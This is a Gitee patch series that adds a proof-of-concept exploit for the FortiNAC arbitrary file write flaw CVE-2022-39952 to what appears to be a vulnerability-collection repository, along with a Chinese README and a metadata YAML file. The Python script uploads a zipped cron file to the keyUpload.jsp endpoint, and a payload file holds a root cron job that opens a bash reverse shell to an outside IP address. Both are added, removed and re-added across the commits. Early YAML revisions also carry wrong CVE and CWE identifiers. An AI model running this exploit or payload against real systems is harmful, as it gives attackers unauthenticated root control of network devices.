From ca454f5783b24af4cf2c602c608c9f212250897e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Thu, 9 Mar 2023 15:13:58 +0000 Subject: [PATCH 01/19] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E4=BA=86CVE-2022-39952?= =?UTF-8?q?=E7=9A=84poc.=202023=E5=B9=B42=E6=9C=8816=E6=97=A5=E6=98=9F?= =?UTF-8?q?=E6=9C=9F=E5=9B=9B=EF=BC=8CFortinet=E5=8F=91=E5=B8=83=E4=BA=86?= =?UTF-8?q?=E4=B8=80=E4=BB=BDPSIRT=EF=BC=8C=E8=AF=A6=E7=BB=86=E8=AF=B4?= =?UTF-8?q?=E6=98=8E=E4=BA=86CVE-2022-39952=EF=BC=8C=E8=BF=99=E6=98=AF?= =?UTF-8?q?=E4=B8=80=E4=B8=AA=E5=BD=B1=E5=93=8D=E5=85=B6FortiNAC=E4=BA=A7?= =?UTF-8?q?=E5=93=81=E7=9A=84=E5=85=B3=E9=94=AE=E6=BC=8F=E6=B4=9E=E3=80=82?= =?UTF-8?q?Fortinet=E7=9A=84Gwendal=20Gu=C3=A9gniaud=E5=8F=91=E7=8E=B0?= =?UTF-8?q?=E4=BA=86=E6=AD=A4=E6=BC=8F=E6=B4=9E=EF=BC=8C=E5=85=81=E8=AE=B8?= =?UTF-8?q?=E6=9C=AA=E7=BB=8F=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=9A=84?= =?UTF-8?q?=E6=94=BB=E5=87=BB=E8=80=85=E5=9C=A8=E7=B3=BB=E7=BB=9F=E4=B8=8A?= =?UTF-8?q?=E5=86=99=E5=85=A5=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=EF=BC=8C?= =?UTF-8?q?=E4=BB=8E=E8=80=8C=E5=9C=A8=E6=A0=B9=E7=94=A8=E6=88=B7=E7=9A=84?= =?UTF-8?q?=E4=B8=8A=E4=B8=8B=E6=96=87=E4=B8=AD=E6=89=A7=E8=A1=8C=E8=BF=9C?= =?UTF-8?q?=E7=A8=8B=E4=BB=A3=E7=A0=81=E3=80=82=E6=AD=A4=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E7=94=B1=20Fortinet=20=E7=9A=84=20Gwendal=20Gu=C3=A9gniaud=20?= =?UTF-8?q?=E5=8F=91=E7=8E=B0=EF=BC=8C=E5=85=81=E8=AE=B8=E6=9C=AA=E7=BB=8F?= =?UTF-8?q?=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=9A=84=E6=94=BB=E5=87=BB?= =?UTF-8?q?=E8=80=85=E5=9C=A8=E7=B3=BB=E7=BB=9F=E4=B8=8A=E5=86=99=E5=85=A5?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=EF=BC=8C=E4=BB=8E=E8=80=8C?= =?UTF-8?q?=E5=9C=A8=E6=A0=B9=E7=94=A8=E6=88=B7=E7=9A=84=E4=B8=8A=E4=B8=8B?= =?UTF-8?q?=E6=96=87=E4=B8=AD=E8=8E=B7=E5=8F=96=E8=BF=9C=E7=A8=8B=E4=BB=A3?= =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=EF=BC=8C=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E5=86=99=E5=85=A5=E6=BC=8F=E6=B4=9E=E5=8F=AF=E9=80=9A?= =?UTF-8?q?=E8=BF=87=E5=A4=9A=E7=A7=8D=E6=96=B9=E5=BC=8F=E8=A2=AB=E6=BB=A5?= =?UTF-8?q?=E7=94=A8=EF=BC=8C=E4=BB=A5=E8=8E=B7=E5=8F=96=E8=BF=9C=E7=A8=8B?= =?UTF-8?q?=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- debian/CVE-2022-39952.py | 29 +++++++++++++++++++++++++++++ debian/payload | 1 + 2 files changed, 30 insertions(+) create mode 100644 debian/CVE-2022-39952.py create mode 100644 debian/payload diff --git a/debian/CVE-2022-39952.py b/debian/CVE-2022-39952.py new file mode 100644 index 00000000..b5cd9247 --- /dev/null +++ b/debian/CVE-2022-39952.py @@ -0,0 +1,29 @@ +#!/usr/bin/python3 +import argparse +import requests +import zipfile +import urllib3 +urllib3.disable_warnings() + + +def exploit(target): + url = f'https://{target}:8443/configWizard/keyUpload.jsp' + r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False) + if 'SuccessfulUpload' in r.text: + print(f'[+] Payload successfully delivered') + +def make_zip(payload_file): + fullpath = '/etc/cron.d/payload' + zf = zipfile.ZipFile('payload.zip', 'w') + zf.write(payload_file, fullpath) + zf.close() + print(f'[+] Wrote {payload_file} to {fullpath}') + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-t', '--target', help='The IP address of the target', required=True) + parser.add_argument('-f', '--file', help='The cronjob payload file', required=True) + args = parser.parse_args() + + make_zip(args.file) + exploit(args.target) diff --git a/debian/payload b/debian/payload new file mode 100644 index 00000000..9c773e16 --- /dev/null +++ b/debian/payload @@ -0,0 +1 @@ +* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1 -- Gitee From 5221103c12b5b1d631e925494b201746b54eb6a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:51:26 +0000 Subject: [PATCH 02/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20de?= =?UTF-8?q?bian/CVE-2022-39952.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- debian/CVE-2022-39952.py | 29 ----------------------------- 1 file changed, 29 deletions(-) delete mode 100644 debian/CVE-2022-39952.py diff --git a/debian/CVE-2022-39952.py b/debian/CVE-2022-39952.py deleted file mode 100644 index b5cd9247..00000000 --- a/debian/CVE-2022-39952.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/python3 -import argparse -import requests -import zipfile -import urllib3 -urllib3.disable_warnings() - - -def exploit(target): - url = f'https://{target}:8443/configWizard/keyUpload.jsp' - r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False) - if 'SuccessfulUpload' in r.text: - print(f'[+] Payload successfully delivered') - -def make_zip(payload_file): - fullpath = '/etc/cron.d/payload' - zf = zipfile.ZipFile('payload.zip', 'w') - zf.write(payload_file, fullpath) - zf.close() - print(f'[+] Wrote {payload_file} to {fullpath}') - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument('-t', '--target', help='The IP address of the target', required=True) - parser.add_argument('-f', '--file', help='The cronjob payload file', required=True) - args = parser.parse_args() - - make_zip(args.file) - exploit(args.target) -- Gitee From c8e729e0304584f92d6ff843b369f88d1a7ffdfa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:51:35 +0000 Subject: [PATCH 03/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20de?= =?UTF-8?q?bian/payload?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- debian/payload | 1 - 1 file changed, 1 deletion(-) delete mode 100644 debian/payload diff --git a/debian/payload b/debian/payload deleted file mode 100644 index 9c773e16..00000000 --- a/debian/payload +++ /dev/null @@ -1 +0,0 @@ -* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1 -- Gitee From 1d0fb0bee97fdd1555b57ed2db7e2eebcd242880 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:52:47 +0000 Subject: [PATCH 04/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20fortinac?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/.keep diff --git a/cve/fortinac/.keep b/cve/fortinac/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 7af16ebc131b56d6ab1751b2b764a6c45bf72fb7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:54:18 +0000 Subject: [PATCH 05/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-39952?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/CVE-2022-39952/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/CVE-2022-39952/.keep diff --git a/cve/fortinac/CVE-2022-39952/.keep b/cve/fortinac/CVE-2022-39952/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d5005766b923a77855bc2570b48028b81b00d641 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:03:11 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-39952=E7=9A=84?= =?UTF-8?q?poc=20CVE-2022-39952=E7=9A=84=E7=9B=B8=E5=85=B3poc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2023年2月16日星期四,Fortinet发布了一份PSIRT,详细说明了CVE-2022-39952,这是一个影响其FortiNAC产品的关键漏洞。Fortinet的Gwendal Guégniaud发现了此漏洞,允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码。本次PR添加了该漏洞相关的poc Signed-off-by: 冉沛筠 --- cve/fortinac/CVE-2022-39952/CVE-2022-39952.py | 29 ++++++++++++ cve/fortinac/CVE-2022-39952/README.md | 45 +++++++++++++++++++ cve/fortinac/CVE-2022-39952/payload | 1 + 3 files changed, 75 insertions(+) create mode 100644 cve/fortinac/CVE-2022-39952/CVE-2022-39952.py create mode 100644 cve/fortinac/CVE-2022-39952/README.md create mode 100644 cve/fortinac/CVE-2022-39952/payload diff --git a/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py b/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py new file mode 100644 index 00000000..b5cd9247 --- /dev/null +++ b/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py @@ -0,0 +1,29 @@ +#!/usr/bin/python3 +import argparse +import requests +import zipfile +import urllib3 +urllib3.disable_warnings() + + +def exploit(target): + url = f'https://{target}:8443/configWizard/keyUpload.jsp' + r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False) + if 'SuccessfulUpload' in r.text: + print(f'[+] Payload successfully delivered') + +def make_zip(payload_file): + fullpath = '/etc/cron.d/payload' + zf = zipfile.ZipFile('payload.zip', 'w') + zf.write(payload_file, fullpath) + zf.close() + print(f'[+] Wrote {payload_file} to {fullpath}') + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-t', '--target', help='The IP address of the target', required=True) + parser.add_argument('-f', '--file', help='The cronjob payload file', required=True) + args = parser.parse_args() + + make_zip(args.file) + exploit(args.target) diff --git a/cve/fortinac/CVE-2022-39952/README.md b/cve/fortinac/CVE-2022-39952/README.md new file mode 100644 index 00000000..a8c77c69 --- /dev/null +++ b/cve/fortinac/CVE-2022-39952/README.md @@ -0,0 +1,45 @@ +#CVE-2022-39952 + +CVE-2022-39952的POC影响Fortinet FortiNAC + + + +此漏洞的默认配置编写cron作业以创建 + +反向外壳。确保更改“有效负载”文件以适合您的环境。 + + + +##技术分析 + +可以在我们的博客上找到漏洞和危害指标的技术根源分析: + +https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs + + + +##摘要 + +这个POC滥用keyUpload.jsp端点来实现任意文件写入。 + + + +##用途 + +```明文 + +root@kali:~/CVE-2022-39952#python3 CVE-2022-39952py--目标10.0.40.85--文件负载 + +[+]将负载写入/etc/cron.d/payload + +[+]有效负载已成功传递 + +``` + + + +##解决措施 + +按照PSIRT中的说明更新至最新版本 + +https://www.fortiguard.com/psirt/FG-IR-22-300 \ No newline at end of file diff --git a/cve/fortinac/CVE-2022-39952/payload b/cve/fortinac/CVE-2022-39952/payload new file mode 100644 index 00000000..9c773e16 --- /dev/null +++ b/cve/fortinac/CVE-2022-39952/payload @@ -0,0 +1 @@ +* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1 -- Gitee From 11a4a649c91c418585dddd4b77de7bf9e40fdfa8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:03:29 +0000 Subject: [PATCH 07/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/fortinac/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/fortinac/.keep diff --git a/cve/fortinac/.keep b/cve/fortinac/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From b88e2e116e38f139ff2f34a412ebbd4639acbe94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:03:48 +0000 Subject: [PATCH 08/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/yaml/.keep diff --git a/cve/fortinac/yaml/.keep b/cve/fortinac/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 5542199e55332cbbbc999c7e531a457beec63502 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:07:16 +0000 Subject: [PATCH 09/19] add cve/fortinac/yaml/CVE-2022-39952. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/yaml/CVE-2022-39952.yaml diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From 3b324ce1941bcff446471c1306ed2d7f7904ad72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:17:11 +0000 Subject: [PATCH 10/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml index e69de29b..d224a5c1 100644 --- a/cve/fortinac/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/yaml/CVE-2022-39952.yaml @@ -0,0 +1,26 @@ +id: CVE-2022-39952 +source: https://github.com/horizon3ai/CVE-2022-39952 +info: + name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动. + severity: critical + description: 此漏洞默认配置会写入cron作业以创建反转外壳m允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码 + scope-of-influence: + FortiNAC version 9.4.0 + FortiNAC version 9.2.0 through 9.2.5 + FortiNAC version 9.1.0 through 9.1.7 + FortiNAC 8.8 all versions + FortiNAC 8.7 all versions + FortiNAC 8.6 all versions + FortiNAC 8.5 all versions + FortiNAC 8.3 all versions + reference: + - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs + - https://www.fortiguard.com/psirt/FG-IR-22-300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0265 + cwe-id: CWE-611 + cnvd-id: None + kve-id: None + tags: cve, xxe \ No newline at end of file -- Gitee From 3b61c7e834180ef226b53a736869944295d11fc8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:17:34 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/fortinac/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/fortinac/yaml/.keep diff --git a/cve/fortinac/yaml/.keep b/cve/fortinac/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From feefb09a757730934dbe1b7dd74fc34ecdcb7bff Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:38:50 +0000 Subject: [PATCH 12/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml index d224a5c1..cb134a42 100644 --- a/cve/fortinac/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/yaml/CVE-2022-39952.yaml @@ -3,7 +3,7 @@ source: https://github.com/horizon3ai/CVE-2022-39952 info: name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动. severity: critical - description: 此漏洞默认配置会写入cron作业以创建反转外壳m允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码 + description: 该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码 scope-of-influence: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 @@ -17,10 +17,10 @@ info: - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs - https://www.fortiguard.com/psirt/FG-IR-22-300 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C cvss-score: 9.8 - cve-id: CVE-2022-0265 - cwe-id: CWE-611 - cnvd-id: None + cve-id: CVE-2022-39952 + cwe-id: None + cnnvd-id: CNNVD-202302-1434 kve-id: None - tags: cve, xxe \ No newline at end of file + tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From e380543bfce9573dc3f891f20a3d7048f544804d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:43:51 +0000 Subject: [PATCH 13/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml index cb134a42..b213bf79 100644 --- a/cve/fortinac/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/yaml/CVE-2022-39952.yaml @@ -1,18 +1,19 @@ id: CVE-2022-39952 source: https://github.com/horizon3ai/CVE-2022-39952 info: - name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动. + name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动。 severity: critical - description: 该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码 + description: | + 该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。 scope-of-influence: FortiNAC version 9.4.0 - FortiNAC version 9.2.0 through 9.2.5 - FortiNAC version 9.1.0 through 9.1.7 - FortiNAC 8.8 all versions - FortiNAC 8.7 all versions - FortiNAC 8.6 all versions - FortiNAC 8.5 all versions - FortiNAC 8.3 all versions + FortiNAC version 9.2.0 至 9.2.5 + FortiNAC version 9.1.0 至 9.1.7 + FortiNAC 8.8 所有版本 + FortiNAC 8.7 所有版本 + FortiNAC 8.6 所有版本 + FortiNAC 8.5 所有版本 + FortiNAC 8.3 所有版本 reference: - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs - https://www.fortiguard.com/psirt/FG-IR-22-300 @@ -20,7 +21,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C cvss-score: 9.8 cve-id: CVE-2022-39952 - cwe-id: None + cwe-id: CWE-21 cnnvd-id: CNNVD-202302-1434 kve-id: None tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From 47cea9c331bf2b3e0a6b38d5ae629682239417cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Tue, 14 Mar 2023 01:55:59 +0000 Subject: [PATCH 14/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml index b213bf79..8c4efdf1 100644 --- a/cve/fortinac/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/yaml/CVE-2022-39952.yaml @@ -17,11 +17,12 @@ info: reference: - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs - https://www.fortiguard.com/psirt/FG-IR-22-300 + - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C cvss-score: 9.8 cve-id: CVE-2022-39952 - cwe-id: CWE-21 + cwe-id: CWE-610 cnnvd-id: CNNVD-202302-1434 kve-id: None tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From 7ab36efacf35686eb73a31406b25c968e1450c2f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Tue, 14 Mar 2023 01:57:51 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/fortinac/CVE-2022-39952/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/CVE-2022-39952/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/fortinac/CVE-2022-39952/.keep diff --git a/cve/fortinac/CVE-2022-39952/.keep b/cve/fortinac/CVE-2022-39952/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 5e46448dfb6886ec81275c6692dd03c7b31bb5d6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Tue, 14 Mar 2023 04:13:58 +0000 Subject: [PATCH 16/19] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/fortina?= =?UTF-8?q?c=20=E4=B8=BA=20cve/fortinac/2022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/{ => 2022}/CVE-2022-39952/CVE-2022-39952.py | 0 cve/fortinac/{ => 2022}/CVE-2022-39952/README.md | 0 cve/fortinac/{ => 2022}/CVE-2022-39952/payload | 0 cve/fortinac/{ => 2022}/yaml/CVE-2022-39952.yaml | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename cve/fortinac/{ => 2022}/CVE-2022-39952/CVE-2022-39952.py (100%) rename cve/fortinac/{ => 2022}/CVE-2022-39952/README.md (100%) rename cve/fortinac/{ => 2022}/CVE-2022-39952/payload (100%) rename cve/fortinac/{ => 2022}/yaml/CVE-2022-39952.yaml (100%) diff --git a/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py b/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py similarity index 100% rename from cve/fortinac/CVE-2022-39952/CVE-2022-39952.py rename to cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py diff --git a/cve/fortinac/CVE-2022-39952/README.md b/cve/fortinac/2022/CVE-2022-39952/README.md similarity index 100% rename from cve/fortinac/CVE-2022-39952/README.md rename to cve/fortinac/2022/CVE-2022-39952/README.md diff --git a/cve/fortinac/CVE-2022-39952/payload b/cve/fortinac/2022/CVE-2022-39952/payload similarity index 100% rename from cve/fortinac/CVE-2022-39952/payload rename to cve/fortinac/2022/CVE-2022-39952/payload diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml similarity index 100% rename from cve/fortinac/yaml/CVE-2022-39952.yaml rename to cve/fortinac/2022/yaml/CVE-2022-39952.yaml -- Gitee From 055e3a48b0c023cbf0bf2878015335aa8cbe5a5e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Wed, 15 Mar 2023 03:56:55 +0000 Subject: [PATCH 17/19] update cve/fortinac/2022/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/2022/yaml/CVE-2022-39952.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml index 8c4efdf1..98f30f02 100644 --- a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml @@ -19,10 +19,10 @@ info: - https://www.fortiguard.com/psirt/FG-IR-22-300 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-610 - cnnvd-id: CNNVD-202302-1434 + cnvd-id: None kve-id: None tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From 4b2da201b5770bd9e96cc569a5448e45a871c010 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Wed, 15 Mar 2023 07:28:35 +0000 Subject: [PATCH 18/19] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7..f488b496 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -51,6 +51,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + fortinac: + - CVE-2022-39952 cnvd: kve: kylin-software-properties: -- Gitee From e922beb80fa27d7c4cb297eabee1fa25755ae8ef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= 